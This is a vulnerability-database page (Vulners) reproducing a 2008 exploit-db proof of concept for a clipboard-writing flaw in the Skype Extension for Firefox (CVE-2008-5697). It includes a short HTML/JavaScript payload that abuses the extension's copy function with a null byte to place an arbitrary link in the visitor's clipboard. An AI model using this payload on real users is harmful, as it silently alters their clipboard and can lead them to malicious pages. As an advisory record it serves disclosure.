Lucene search
+L

Skype Extension for Firefox Beta 2.2.0.95 - Clipboard Writing

🗓️ 07 Oct 2008 00:00:00Reported by irk4zType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Skype Extension for Firefox Beta Clipboard Writing Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-5697
7 Oct 200800:00
circl
cve
CVE
CVE-2008-5697
22 Dec 200815:00
cve
cvelist
Cvelist
CVE-2008-5697
22 Dec 200815:00
cvelist
euvd
EUVD
EUVD-2008-5668
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-5697
22 Dec 200815:30
nvd
prion
Prion
Code injection
22 Dec 200815:30
prion
<!---------------------------------------------------------------------------
 Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability PoC
 download: https://developer.skype.com/SkypeToolbars

 Author: irk4z[at]yahoo.pl
 homepage: http://irk4z.wordpress.com/

 greets: all friends
---------------------------------------------------------------------------->
<a href="#" onclick="check_it();" >test it!</a>


<script type="text/javascript">

function copy_to_clipboard( text ){
	if (skype_tool) {
		var copy_it = text + '\0+'; //use null byte to copy value, because '+' char must be in string
		skype_tool.copy_num( copy_it );
	}
}

function check_it(){
	//copy_to_clipboard('malicious text!!!!!!!!!!!\n\n\n!!');
	//copy_to_clipboard('http://irk4z.wordpress.com/');
	copy_to_clipboard('http://malicious.link.to.bad.page/');
	alert('Done! Check your clipboard!');
}

</script>

# milw0rm.com [2008-10-07]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Oct 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.02175
34